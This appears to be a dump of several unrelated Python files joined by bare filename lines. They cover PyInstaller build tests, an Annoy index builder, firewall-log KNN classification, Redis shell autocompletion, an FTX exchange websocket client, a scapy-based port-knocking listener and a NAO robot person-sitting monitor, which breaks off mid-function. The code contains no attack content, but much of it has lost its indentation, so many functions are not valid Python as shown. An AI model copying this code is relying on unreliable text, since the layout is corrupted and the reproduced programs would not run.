assert not isabs(pyi_dummy_module.dummy.__code__.co_filename), "pyi_dummy_module.dummy.__code__.co_filename has compiled filename: %s" % (pyi_dummy_module.dummy.__code__.co_filename,)
assert not isabs(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename), "pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename has compiled filename: %s" % (pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename,)
""")
def test_decoders_ascii(pyi_builder):
pyi_builder.test_source(
"""
# Convert type 'bytes' to type 'str'.
assert b'foo'.decode('ascii') == 'foo'
""")
def test_distutils_submod(pyi_builder):
# Test import of submodules of distutils package
# PyI fails to include `distutils.version` when running from virtualenv
pyi_builder.test_source(
"""
from distutils.version import LooseVersion
""")
def test_dynamic_module(pyi_builder):
pyi_builder.test_source(
"""
import pyi_testmod_dynamic
# The value 'foo' should not be None.
print("'foo' value: %s" % pyi_testmod_dynamic.foo)
assert pyi_testmod_dynamic.foo is not None
assert pyi_testmod_dynamic.foo == 'A new value!'
""")
def test_email(pyi_builder):
pyi_builder.test_source(
"""
from email import utils
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
""")
@importorskip('tinyaes')
def test_feature_crypto(pyi_builder):
pyi_builder.test_source(
"""
from pyimod00_crypto_key import key
from pyimod02_archive import CRYPT_BLOCK_SIZE
# Test against issue #1663: importing a package in the bootstrap
# phase should not interfere with subsequent imports.
import tinyaes
assert type(key) is str
# The test runner uses 'test_key' as key.
assert key == 'test_key'.zfill(CRYPT_BLOCK_SIZE)
""",
pyi_args=['--key=test_key'])
def test_feature_nocrypto(pyi_builder):
pyi_builder.test_source(
"""
try:
import pyimod00_crypto_key
raise AssertionError('The pyimod00_crypto_key module must NOT be there if crypto is disabled.')
except ImportError:
pass
""")
def test_filename(pyi_builder):
pyi_builder.test_script('pyi_filename.py')
def test_getfilesystemencoding(pyi_builder):
pyi_builder.test_script('pyi_getfilesystemencoding.py')
def test_helloworld(pyi_builder):
pyi_builder.test_source("print('Hello Python!')")
def test_module__file__attribute(pyi_builder):
pyi_builder.test_script('pyi_module__file__attribute.py')
def test_module_attributes(tmpdir, pyi_builder):
# Create file in tmpdir with path to python executable and if it is running
# in debug mode.
# Test script uses python interpreter to compare module attributes.
with open(os.path.join(tmpdir.strpath, 'python_exe.build'), 'w') as f:
f.write(sys.executable + "\n")
f.write('debug=%s' % __debug__ + '\n')
    # On Windows we need to preserve the system PATH for subprocesses in tests.
f.write(os.environ.get('PATH') + '\n')
pyi_builder.test_script('pyi_module_attributes.py')
@xfail(is_darwin, reason='Issue #1895.')
def test_module_reload(pyi_builder):
pyi_builder.test_script('pyi_module_reload.py')
# TODO test it on OS X.
@skipif_no_compiler
def test_load_dll_using_ctypes(monkeypatch, pyi_builder, compiled_dylib):
# Note that including the data_dir fixture copies files needed by this test.
#
# TODO Make sure PyInstaller is able to find the library and bundle it with the app.
# # If the required dylib does not reside in the current directory, the Analysis
# # class machinery, based on ctypes.util.find_library, will not find it. This
# # was done on purpose for this test, to show how to give Analysis class
# # a clue.
# if is_win:
# os.environ['PATH'] = os.path.abspath(CTYPES_DIR) + ';' + os.environ['PATH']
# else:
# os.environ['LD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['DYLD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['LIBPATH'] = CTYPES_DIR
# Build and run the app.
pyi_builder.test_script('pyi_load_dll_using_ctypes.py')
def test_get_meipass_value(pyi_builder):
pyi_builder.test_script('pyi_get_meipass_value.py')
def test_chdir_meipass(pyi_builder):
# Ensure meipass dir exists.
pyi_builder.test_source(
"""
import os, sys
os.chdir(sys._MEIPASS)
print(os.getcwd())
""")
def test_option_exclude_module(pyi_builder):
"""
Test to ensure that when using option --exclude-module=xml.sax
the module 'xml.sax' won't be bundled.
"""
pyi_builder.test_source(
"""
try:
import xml.sax
# Option --exclude-module=xml.sax did not work and the module
# was successfully imported.
raise SystemExit('Module xml.sax was excluded but it is '
'bundled with the executable.')
except ImportError:
# The Import error is expected since PyInstaller should
# not bundle 'xml.sax' module.
pass
""",
pyi_args=['--exclude-module', 'xml.sax'])
def test_option_verbose(pyi_builder, monkeypatch):
"Test to ensure that option V can be set and has effect."
# This option is like 'python -v' - trace import statements.
# 'None' should be allowed or '' also.
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('v', None, 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
print('test - PYTHONVERBOSE - trace import statements')
import re # just import anything
print('test - done')
""")
def test_option_w_unset(pyi_builder):
"Test to ensure that option W is not set by default."
pyi_builder.test_source(
"""
import sys
assert 'ignore' not in sys.warnoptions
""")
def test_option_w_ignore(pyi_builder, monkeypatch, capsys):
"Test to ensure that option W can be set."
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('W ignore', '', 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
import sys
assert 'ignore' in sys.warnoptions
""")
_, err = capsys.readouterr()
assert "'import warnings' failed" not in err
@skipif_win
def test_python_makefile(pyi_builder):
pyi_builder.test_script('pyi_python_makefile.py')
def test_set_icon(pyi_builder, data_dir):
if is_win:
args = ['--icon', os.path.join(data_dir.strpath, 'pyi_icon.ico')]
elif is_darwin:
# On OS X icon is applied only for windowed mode.
args = ['--windowed', '--icon', os.path.join(data_dir.strpath, 'pyi_icon.icns')]
else:
pytest.skip('option --icon works only on Windows and Mac OS X')
pyi_builder.test_source("print('Hello Python!')", pyi_args=args)
def test_python_home(pyi_builder):
pyi_builder.test_script('pyi_python_home.py')
def test_stderr_encoding(tmpdir, pyi_builder):
# NOTE: '-s' option to pytest disables output capturing, changing this test's result:
# without -s: py.test process changes its own stdout encoding to 'UTF-8' to
# capture output. subprocess spawned by py.test has stdout encoding
# 'cp1252', which is an ANSI codepage. test fails as they do not match.
# with -s: py.test process has stdout encoding from windows terminal, which is an
# OEM codepage. spawned subprocess has the same encoding. test passes.
#
with open(os.path.join(tmpdir.strpath, 'stderr_encoding.build'), 'w') as f:
if sys.stderr.isatty():
enc = str(sys.stderr.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stderr_encoding.py')
def test_stdout_encoding(tmpdir, pyi_builder):
with open(os.path.join(tmpdir.strpath, 'stdout_encoding.build'), 'w') as f:
if sys.stdout.isatty():
enc = str(sys.stdout.encoding)
else:
            # For non-interactive stdout use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stdout_encoding.py')
def test_site_module_disabled(pyi_builder):
pyi_builder.test_script('pyi_site_module_disabled.py')
def test_time_module(pyi_builder):
pyi_builder.test_source(
"""
import time
print(time.strptime(time.ctime()))
""")
@skipif_win
def test_time_module_localized(pyi_builder, monkeypatch):
# This checks that functions 'time.ctime()' and 'time.strptime()'
# use the same locale. There was an issue with bootloader where
# every function was using different locale:
# time.ctime was using 'C'
# time.strptime was using 'xx_YY' from the environment.
lang = 'cs_CZ' if is_darwin else 'cs_CZ.UTF-8'
monkeypatch.setenv('LC_ALL', lang)
pyi_builder.test_source(
"""
import time
print(time.strptime(time.ctime()))
""")
def test_xmldom_module(pyi_builder):
pyi_builder.test_source(
"""
print('Importing xml.dom')
from xml.dom import pulldom
print('Importing done')
""")
def test_threading_module(pyi_builder):
pyi_builder.test_source(
"""
import threading
import sys
print('See stderr for messages')
def print_(*args): print(*args, file=sys.stderr)
def doit(nm):
print_(nm, 'started')
import pyi_testmod_threading
try:
print_(nm, pyi_testmod_threading.x)
finally:
print_(nm, pyi_testmod_threading)
t1 = threading.Thread(target=doit, args=('t1',))
t2 = threading.Thread(target=doit, args=('t2',))
t1.start()
t2.start()
doit('main')
t1.join() ; print_('t1 joined')
t2.join() ; print_('t2 joined')
print_('finished.')
""")
def test_threading_module2(pyi_builder):
pyi_builder.test_script('pyi_threading_module2.py')
def test_argument(pyi_builder):
pyi_builder.test_source(
'''
import sys
assert sys.argv[1] == "--argument", "sys.argv[1] was %s, expected %r" % (sys.argv[1], "--argument")
''',
app_args=["--argument"])
@importorskip('win32com')
def test_pywin32_win32com(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
        # All modules from pywin32 depend on the pywintypes module,
        # which should also be included.
import win32com
import win32com.client
import win32com.server
""")
#@pytest.mark.xfail(reason="Requires post-create-package hooks (issue #1322)")
@importorskip('win32com')
def test_pywin32_comext(pyi_builder):
pyi_builder.test_source(
"""
# Test importing modules from win32com that are actually present in
# win32comext, and made available by __path__ changes in win32com.
from win32com.shell import shell
from win32com.propsys import propsys
from win32com.bits import bits
""")
@importorskip('win32ui')
def test_pywin32_win32ui(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
        # All modules from pywin32 depend on the module pywintypes.
        # That module should also be included.
import win32ui
from pywin.mfc.dialog import Dialog
d = Dialog(win32ui.IDD_SIMPLE_INPUT)
""")
@skipif_notwin
def test_renamed_exe(pyi_builder):
_old_find_executables = pyi_builder._find_executables
def _find_executables(name):
oldexes = _old_find_executables(name)
newexes = []
for old in oldexes:
new = os.path.join(os.path.dirname(old), "renamed_" + os.path.basename(old))
os.rename(old, new)
newexes.append(new)
return newexes
pyi_builder._find_executables = _find_executables
pyi_builder.test_source("print('Hello Python!')")
def test_spec_with_utf8(pyi_builder_spec):
pyi_builder_spec.test_spec('spec-with-utf8.spec')
@skipif_notosx
def test_osx_override_info_plist(pyi_builder_spec):
pyi_builder_spec.test_spec('pyi_osx_override_info_plist.spec')
def test_hook_collect_submodules(pyi_builder, script_dir):
# This is designed to test the operation of
# PyInstaller.utils.hook.collect_submodules. To do so:
#
# 1. It imports the dummy module pyi_collect_submodules_mod, which
# contains nothing.
# 2. This causes hook-pyi_collect_submodules_mod.py to be run,
# which collects some dummy submodules. In this case, it
# collects from modules/pyi_testmod_relimp.
# 3. Therefore, we should be able to find hidden imports under
# pyi_testmod_relimp.
pyi_builder.test_source(
"""
import pyi_collect_submodules_mod
__import__('pyi_testmod_relimp.B.C')
""",
['--additional-hooks-dir=%s' % script_dir.join('pyi_hooks')])
# Test that PyInstaller can handle a script with an arbitrary extension.
def test_arbitrary_ext(pyi_builder):
pyi_builder.test_script('pyi_arbitrary_ext.foo')
def test_option_runtime_tmpdir(pyi_builder):
"Test to ensure that option `runtime_tmpdir` can be set and has effect."
pyi_builder.test_source(
"""
print('test - runtime_tmpdir - custom runtime temporary directory')
import os
import sys
if sys.platform == 'win32':
import win32api
cwd = os.path.abspath(os.getcwd())
runtime_tmpdir = os.path.abspath(sys._MEIPASS)
# for onedir mode, runtime_tmpdir == cwd
# for onefile mode, os.path.dirname(runtime_tmpdir) == cwd
if not runtime_tmpdir == cwd and not os.path.dirname(runtime_tmpdir) == cwd:
raise SystemExit('Expected sys._MEIPASS to be under current working dir.'
' sys._MEIPASS = ' + runtime_tmpdir + ', cwd = ' + cwd)
print('test - done')
""",
['--runtime-tmpdir=.']) # set runtime-tmpdir to current working dir
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts1(pyi_builder_spec):
"""Verify each script has it's own global vars (original case, see issue
#2949).
"""
pyi_builder_spec.test_spec('several-scripts1.spec')
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts2(pyi_builder_spec):
"""
    Verify each script has its own global vars (basic test).
"""
pyi_builder_spec.test_spec('several-scripts2.spec')
|
indexer.py
|
# coding: utf-8
from __future__ import print_function
from __future__ import unicode_literals
import annoy
import time
import tqdm
import random
import multiprocessing
def graceful_exit(fn):
def _impl(*args, **kwargs):
try:
return fn(*args, **kwargs)
except KeyboardInterrupt:
return None
return _impl
class Indexer(object):
def __init__(self,
index_path,
update_interval=10,
index_trees=20,
vector_length=384):
self.index_path = index_path
self.update_interval = update_interval
self.index_trees = index_trees
self.vector_length = vector_length
self.mapping = {}
def initial_load(self):
raise NotImplementedError
def update(self):
        # Return a falsy value if no updates were detected
raise NotImplementedError
def save_annoy_file(self):
index = annoy.AnnoyIndex(self.vector_length)
for i, v in tqdm.tqdm(self.mapping.items()):
try:
index.add_item(i, v)
except IndexError as e:
continue
t = time.time()
index.build(self.index_trees)
index.save(self.index_path)
index.unload()
def _run_init(self):
self.initial_load()
self.save_annoy_file()
def _run_step(self):
changed = self.update()
if changed:
self.save_annoy_file()
@graceful_exit
def run(self):
self._run_init()
while True:
self._run_step()
time.sleep(self.update_interval)
def background(self):
p = multiprocessing.Process(target=self.run, args=tuple())
p.daemon = False
p.start()
return p
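# --- Hypothetical usage sketch (editor's example, not part of the original module) ---
# Indexer is abstract: a subclass fills self.mapping with {int_id: vector} entries in
# initial_load()/update(), and run()/background() periodically rebuild the Annoy file.
# A minimal subclass might look like:
#
#     class RandomIndexer(Indexer):
#         def initial_load(self):
#             self.mapping = {i: [random.random() for _ in range(self.vector_length)]
#                             for i in range(100)}
#         def update(self):
#             return False  # nothing changed, so save_annoy_file() is skipped
#
#     RandomIndexer("demo.ann", vector_length=8).background()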
|
helpers.py
|
import threading
from app.models import *
from app.preprocessin import *
from app.knn_new import knn_predict
import time
# Explicit imports for names used below (may also be provided by the wildcard imports above).
import sqlite3
import numpy as np
import pandas as pd
class LogFetcher(threading.Thread):
def run(self):
while True:
            latest_pred_id = data_set_normalized.objects.all()
            last_pred_id = len(latest_pred_id) if latest_pred_id is not None else 0
            t = threading.Thread(target=self.preprocess_log, args=(last_pred_id,))
            # target function is preprocess_log
t.start()
time.sleep(3600)
#sleep for 1 hour
def preprocess_log(self,last_pred_id):
        latest_id = data_set.objects.all()
        last_id = len(latest_id) if latest_id is not None else 0
#address where powershell script copies the logs in txt file
file_add = "C:/Users/Dell/Documents/GitHub/Major-Project/FrontEnd/FrontEnd/app/firewalllog.txt"
        # preprocess the txt file and save normalized data in the data_set_normalized model
convert_to_csv(file_add, last_id)
#get the values from database and use prediction
cnx = sqlite3.connect("./db.sqlite3")
df = pd.read_sql("SELECT * FROM app_data_set_normalized WHERE id > (?)",params=(last_pred_id,), con=cnx)
if len(df)==0:
print("no new entries")
else:
            X = np.array(df.drop(["id", "data_set_id"], axis=1))
y = np.array(len(X))
#predict the values
y_pred = knn_predict(X)
#save predicted values into a new database
print(y_pred)
df_pred = pd.DataFrame(y_pred)
df_pred["data_set_id"]=df["data_set_id"]
df_pred.columns=["category", "data_set_id"]
#delete the previous database
#add new prediction into the database
df_pred.to_sql(name="app_classified_data",if_exists = "append", con =cnx, index=False)
print("predicted")
|
completers.py
|
import time
import threading
import logging
from typing import Iterable
from prompt_toolkit.contrib.regular_languages.completion import GrammarCompleter
from prompt_toolkit.contrib.regular_languages.compiler import compile
from prompt_toolkit.completion import WordCompleter, FuzzyWordCompleter
from prompt_toolkit.document import Document
from prompt_toolkit.completion import Completion, CompleteEvent
from .config import config, COMPILING_DONE, COMPILING_JUST_FINISH
from .redis_grammar import REDIS_COMMANDS, CONST
from .lexer import get_lexer
from .commands_csv_loader import group2commands, commands_summary, all_commands
logger = logging.getLogger(__name__)
class LatestUsedFirstWordCompleter(FuzzyWordCompleter):
"""
Not thread safe.
"""
def __init__(self, max_words, words, *args, **kwargs):
self.words = words
self.max_words = max_words
super().__init__(words, *args, **kwargs)
def touch(self, word):
"""
Make sure word is in the first place of the completer
list.
"""
if word in self.words:
self.words.remove(word)
else: # not in words
if len(self.words) == self.max_words: # full
self.words.pop()
self.words.insert(0, word)
def touch_words(self, words):
for word in words:
self.touch(word)
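    # Example of the intended ordering (hypothetical values): with max_words=2 and
    # words == ["a", "b"], touch("b") yields ["b", "a"], while touch("c") evicts the
    # last entry and yields ["c", "a"] -- most recently used first.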
class FakeDocument:
pass
class RedisGrammarCompleter(GrammarCompleter):
"""
    Disables completion on blank characters; completing on blanks causes
    performance issues.
"""
def get_completions(
self, document: Document, complete_event: CompleteEvent
) -> Iterable[Completion]:
origin_text = document.text_before_cursor
stripped = FakeDocument()
stripped.text_before_cursor = origin_text.lstrip()
# Do not complete on spaces, too slow
if not origin_text.strip():
return []
return super().get_completions(stripped, complete_event)
def get_completer(group2commands, redis_grammar):
completer_mapping = {}
# patch command completer with hint
command_hint = {key: info["summary"] for key, info in commands_summary.items()}
for command_group, commands in group2commands.items():
words = commands + [command.lower() for command in commands]
if config.newbie_mode:
hint = {command: command_hint.get(command.upper()) for command in words}
else:
hint = None
completer_mapping[command_group] = WordCompleter(
words, sentence=True, meta_dict=hint
)
key_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
member_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
field_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
completer_mapping.update(
{
key: WordCompleter(tokens.split(" "), ignore_case=True)
for key, tokens in CONST.items()
}
)
completer_mapping.update(
{
# all key related completers share the same completer
"keys": key_completer,
"key": key_completer,
"destination": key_completer,
"newkey": key_completer,
# member
"member": member_completer,
"members": member_completer,
# hash fields
"field": field_completer,
"fields": field_completer,
}
)
completer_mapping["commandname"] = WordCompleter(all_commands, ignore_case=True)
completer = RedisGrammarCompleter(redis_grammar, completer_mapping)
return completer
def compile_grammar_bg(session):
"""
compile redis grammar in a thread, and patch session's lexer
and completer.
"""
def compile_and_patch(session):
start_time = time.time()
logger.debug("[compile] start compile grammer...")
redis_grammar = compile(REDIS_COMMANDS)
end_time = time.time()
logger.debug(f"[compile] Compile finished! Cost: {end_time - start_time}")
# get lexer
lexer = get_lexer(group2commands.keys(), redis_grammar)
# get completer
completer = get_completer(group2commands, redis_grammar)
session.completer = completer
session.lexer = lexer
logger.debug("[compile] Patch finished!")
config.compiling = COMPILING_JUST_FINISH
time.sleep(1)
config.compiling = COMPILING_DONE
# set daemon=True, when main thread exit, this compiling thread should
# exit as well.
compiling_thread = threading.Thread(
target=compile_and_patch, args=(session,), daemon=True
)
compiling_thread.start()
|
ftxclient.py
|
import hmac
import json
import time
import zlib
from collections import defaultdict, deque
from gevent.event import Event
from itertools import zip_longest
from threading import Thread, Lock
from typing import Callable, DefaultDict, Deque, List, Dict, Tuple, Optional
from websocket import WebSocketApp
# based on https://github.com/ftexchange/ftx/tree/master/websocket
class WebsocketManager:
_CONNECT_TIMEOUT_S = 5
def __init__(self):
self.connect_lock = Lock()
self.ws = None
def _get_url(self):
raise NotImplementedError()
def _on_message(self, ws, message):
raise NotImplementedError()
def send(self, message):
self.connect()
self.ws.send(message)
def send_json(self, message):
self.send(json.dumps(message))
def _connect(self):
assert not self.ws, "ws should be closed before attempting to connect"
self.ws = WebSocketApp(
self._get_url(),
on_message=self._wrap_callback(self._on_message),
on_close=self._wrap_callback(self._on_close),
on_error=self._wrap_callback(self._on_error),
)
wst = Thread(target=self._run_websocket, args=(self.ws, ))
wst.daemon = True
wst.start()
# Wait for socket to connect
ts = time.time()
while self.ws and (not self.ws.sock or not self.ws.sock.connected):
if time.time() - ts > self._CONNECT_TIMEOUT_S:
self.ws = None
return
time.sleep(0.1)
def _wrap_callback(self, f):
def wrapped_f(ws, *args, **kwargs):
if ws is self.ws:
try:
f(ws, *args, **kwargs)
except Exception as e:
raise Exception(f'Error running websocket callback: {e}')
return wrapped_f
def _run_websocket(self, ws):
try:
ws.run_forever()
except Exception as e:
raise Exception(f'Unexpected error while running websocket: {e}')
finally:
self._reconnect(ws)
def _reconnect(self, ws):
assert ws is not None, '_reconnect should only be called with an existing ws'
if ws is self.ws:
self.ws = None
ws.close()
self.connect()
def connect(self):
if self.ws:
return
with self.connect_lock:
while not self.ws:
self._connect()
if self.ws:
return
def _on_close(self, ws):
self._reconnect(ws)
def _on_error(self, ws, error):
self._reconnect(ws)
def reconnect(self) -> None:
if self.ws is not None:
self._reconnect(self.ws)
class FtxWebsocketClient(WebsocketManager):
_ENDPOINT = 'wss://ftx.com/ws/'
def __init__(self, api_key=None, api_secret=None) -> None:
super().__init__()
self._trades: DefaultDict[str, Deque] = defaultdict(
lambda: deque([], maxlen=10000))
self._fills: Deque = deque([], maxlen=10000)
self._api_key = api_key
self._api_secret = api_secret
self._orderbook_update_events: DefaultDict[str,
Event] = defaultdict(Event)
self._reset_data()
def _on_open(self, ws):
self._reset_data()
def _reset_data(self) -> None:
self._subscriptions: List[Dict] = []
self._ticker_cbs: Dict[str, Callable[[str, Dict], None]] = {}
self._orders: DefaultDict[int, Dict] = defaultdict(dict)
self._tickers: DefaultDict[str, Dict] = defaultdict(dict)
self._orderbook_timestamps: DefaultDict[str,
float] = defaultdict(float)
self._orderbook_update_events.clear()
self._orderbooks: DefaultDict[str, Dict[str, DefaultDict[
float, float]]] = defaultdict(
lambda:
{side: defaultdict(float)
for side in {'bids', 'asks'}})
self._orderbook_timestamps.clear()
self._logged_in = False
self._last_received_orderbook_data_at: float = 0.0
def _reset_orderbook(self, market: str) -> None:
if market in self._orderbooks:
del self._orderbooks[market]
if market in self._orderbook_timestamps:
del self._orderbook_timestamps[market]
def _get_url(self) -> str:
return self._ENDPOINT
def _login(self) -> None:
ts = int(time.time() * 1000)
self.send_json({
'op': 'login',
'args': {
'key':
self._api_key,
'sign':
hmac.new(self._api_secret.encode(),
f'{ts}websocket_login'.encode(),
'sha256').hexdigest(),
'time':
ts,
}
})
self._logged_in = True
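    # The login payload above signs the string "<ms-timestamp>websocket_login" with
    # HMAC-SHA256 keyed by the API secret; e.g. ts=1577836800000 (an illustrative
    # value) signs b"1577836800000websocket_login".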
def subscribe_ticker(self,
ticker: str,
cb: Callable[[str, Dict], None] = None) -> None:
if ticker in self._ticker_cbs:
return
self._ticker_cbs[ticker] = cb
self._subscribe({'channel': 'ticker', 'market': ticker})
def _subscribe(self, subscription: Dict) -> None:
self.send_json({'op': 'subscribe', **subscription})
self._subscriptions.append(subscription)
def _unsubscribe(self, subscription: Dict) -> None:
self.send_json({'op': 'unsubscribe', **subscription})
while subscription in self._subscriptions:
self._subscriptions.remove(subscription)
def get_fills(self) -> List[Dict]:
if not self._logged_in:
self._login()
subscription = {'channel': 'fills'}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return list(self._fills.copy())
def get_orders(self) -> Dict[int, Dict]:
if not self._logged_in:
self._login()
subscription = {'channel': 'orders'}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return dict(self._orders.copy())
def get_trades(self, market: str) -> List[Dict]:
subscription = {'channel': 'trades', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return list(self._trades[market].copy())
def get_orderbook(self,
market: str) -> Dict[str, List[Tuple[float, float]]]:
subscription = {'channel': 'orderbook', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
if self._orderbook_timestamps[market] == 0:
self.wait_for_orderbook_update(market, 5)
return {
side: sorted([(price, quantity) for price, quantity in list(
self._orderbooks[market][side].items()) if quantity],
key=lambda order: order[0] *
(-1 if side == 'bids' else 1))
for side in {'bids', 'asks'}
}
def get_orderbook_timestamp(self, market: str) -> float:
return self._orderbook_timestamps[market]
def wait_for_orderbook_update(self, market: str,
timeout: Optional[float]) -> None:
subscription = {'channel': 'orderbook', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
self._orderbook_update_events[market].wait(timeout)
def get_ticker(self, market: str) -> Dict:
subscription = {'channel': 'ticker', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return self._tickers[market]
def _handle_orderbook_message(self, message: Dict) -> None:
market = message['market']
subscription = {'channel': 'orderbook', 'market': market}
if subscription not in self._subscriptions:
return
data = message['data']
if data['action'] == 'partial':
self._reset_orderbook(market)
for side in {'bids', 'asks'}:
book = self._orderbooks[market][side]
for price, size in data[side]:
if size:
book[price] = size
else:
del book[price]
self._orderbook_timestamps[market] = data['time']
checksum = data['checksum']
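        # The value recomputed below is crc32 over the first 100 levels interleaved
        # as "bidprice:bidsize:askprice:asksize:...". E.g. one bid (5000.5, 10.0) and
        # one ask (5001.0, 6.0) hash the string "5000.5:10.0:5001.0:6.0".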
orderbook = self.get_orderbook(market)
checksum_data = [
':'.join([
f'{float(order[0])}:{float(order[1])}'
for order in (bid, offer) if order
]) for (bid, offer) in zip_longest(orderbook['bids'][:100],
orderbook['asks'][:100])
]
computed_result = int(zlib.crc32(':'.join(checksum_data).encode()))
if computed_result != checksum:
self._last_received_orderbook_data_at = 0
self._reset_orderbook(market)
self._unsubscribe({'market': market, 'channel': 'orderbook'})
self._subscribe({'market': market, 'channel': 'orderbook'})
else:
self._orderbook_update_events[market].set()
self._orderbook_update_events[market].clear()
def _handle_trades_message(self, message: Dict) -> None:
self._trades[message['market']].append(message['data'])
def _handle_ticker_message(self, message: Dict) -> None:
ticker = message['market']
data = message['data']
self._tickers[ticker] = data
if ticker in self._ticker_cbs:
self._ticker_cbs[ticker](ticker, data)
def _handle_fills_message(self, message: Dict) -> None:
self._fills.append(message['data'])
def _handle_orders_message(self, message: Dict) -> None:
data = message['data']
self._orders.update({data['id']: data})
def _on_message(self, ws, raw_message: str) -> None:
message = json.loads(raw_message)
message_type = message['type']
if message_type in {'subscribed', 'unsubscribed'}:
return
elif message_type == 'info':
if message['code'] == 20001:
return self.reconnect()
elif message_type == 'error':
raise Exception(message)
channel = message['channel']
if channel == 'orderbook':
self._handle_orderbook_message(message)
elif channel == 'trades':
self._handle_trades_message(message)
elif channel == 'ticker':
self._handle_ticker_message(message)
elif channel == 'fills':
self._handle_fills_message(message)
elif channel == 'orders':
self._handle_orders_message(message)
if __name__ == '__main__':
client = FtxWebsocketClient()
client.subscribe_ticker('BTC/USD', lambda ticker, data: print(data))
while True:
time.sleep(3)
|
port_manager.py
|
import socket, sys
from struct import *
import threading
from .proc_worker import ProcWorker, Event, bypass, ProcWorkerEvent, TocTocPortsEvent, PortManagerEvent
import logging
log = logging.getLogger(__name__)
from scapy.all import sniff, IP, TCP
class PortManager():
def __init__(self, address='0.0.0.0', unmanaged_ports=[]):
self._sockets = []
self._threads = []
self._address = address
self._unmanaged_ports = unmanaged_ports
try:
evt = threading.Event()
t = threading.Thread(target=self.wait_and_listen, args=(evt,))
self._threads.append(evt)
t.start()
        except socket.error as e:
            # TODO Send END
            print('Socket could not be created. Error Code : ' + str(e.errno) + ' Message ' + str(e.strerror))
sys.exit()
def wait_and_listen(self, evt):
log.info("wait_and_listen")
        # TODO Figure out why the thread does not terminate...
myfilter = '(tcp[13]&2!=0 and tcp[13]&16==0)'
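        # tcp[13] is the TCP flags byte in the BPF filter: 0x02 = SYN, 0x10 = ACK,
        # so this matches SYN-without-ACK packets, i.e. new inbound connection attempts.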
sniff(prn=lambda pkt: self.notify_connection(pkt[IP].src, pkt[TCP].dport), stop_filter=lambda x: evt.is_set(), filter=myfilter, store=0)
log.info("nor_wait_nor_listen")
def notify_connection(self, addr, port):
log.debug("connection from %s:%s" % (addr, port))
        # TODO Do this with lock-protected methods (@lock)
if addr in self._active:
addr_info = self._active[addr]
if port == addr_info['next']:
next_n = addr_info['n'] + 1
if len(self._port_list) <= next_n:
self.last_port(addr)
del self._active[addr]
else:
addr_info['n'] = next_n
addr_info['next'] = self._port_list[next_n]
self._active[addr] = addr_info
else:
if port not in self._unmanaged_ports:
del self._active[addr]
else:
if self._port_list[0] == port:
self._active[addr] = dict(next=self._port_list[1], n=1)
def last_port(self, addr):
log.info("%s reached last port" % (addr))
# TODO Rename to reset
def open(self, port_list):
self._active = {}
self._port_list = port_list
def close_thread(self, evt):
try:
evt.set()
except Exception as e:
pass
def unlock_threads(self):
while len(self._threads):
try:
evt = self._threads.pop()
self.close_thread(evt)
except Exception as e:
pass
def close(self):
self.unlock_threads()
# https://eli.thegreenplace.net/2011/12/27/python-threads-communication-and-stopping
# http://www.bogotobogo.com/python/Multithread/python_multithreading_Event_Objects_between_Threads.php
class PortManagerWorker(ProcWorker):
def __init__(self, i_q, o_q, pm=None):
super(PortManagerWorker, self).__init__(i_q, o_q)
if not pm:
pm = PortManager()
self._pm = pm
self._pm.notify_connection = bypass(self._pm.notify_connection, self.notify_connection)
self._pm.last_port = bypass(self._pm.last_port, self.last_port)
def notify_connection(self, addr, port):
self._o.put(Event(PortManagerEvent.NEW_CONNECTION, {'port': port, 'address': addr}))
def last_port(self, address):
self._o.put(Event(PortManagerEvent.LAST_PORT, dict(address=address)))
def process_evt(self, evt):
super(PortManagerWorker, self).process_evt(evt)
if evt.get_id() == ProcWorkerEvent.END:
self._pm.close()
if evt.get_id() == TocTocPortsEvent.NEW_SLOT:
port_list = evt.get_value()['port_list'].get_values()
self._pm.open(port_list)
if evt.get_id() == PortManagerEvent.PROTECT_PORT:
pass
|
personsitting.py
|
#! /usr/bin/env python
# -*- encoding: UTF-8 -*-
# DOCUMENTATION
# http://doc.aldebaran.com/2-5/naoqi/peopleperception/alengagementzones-api.html#alengagementzones-api
import qi
import argparse
import sys
import os
import time
import threading
from utils import point2world
from naoqi import ALProxy
import conditions
from conditions import set_condition
def rhMonitorThread (memory_service):
t = threading.currentThread()
print "personsitting thread started"
while getattr(t, "do_run", True):
plist = memory_service.getData("PeoplePerception/VisiblePeopleList")
personid = 0
IsSitting = 0
v = 'false'
#print "[ Person sitting = 0 ]"
#try:
if (plist!=None and len(plist)>0):
for i in range (0,len(plist)):
personid = plist[i]
try:
IsSitting = memory_service.getData("PeoplePerception/Person/"+str(personid)+"/IsSitting")
# Save person position
memory_service.insertData("personsitting/test",personid)
if (IsSitting == 1):
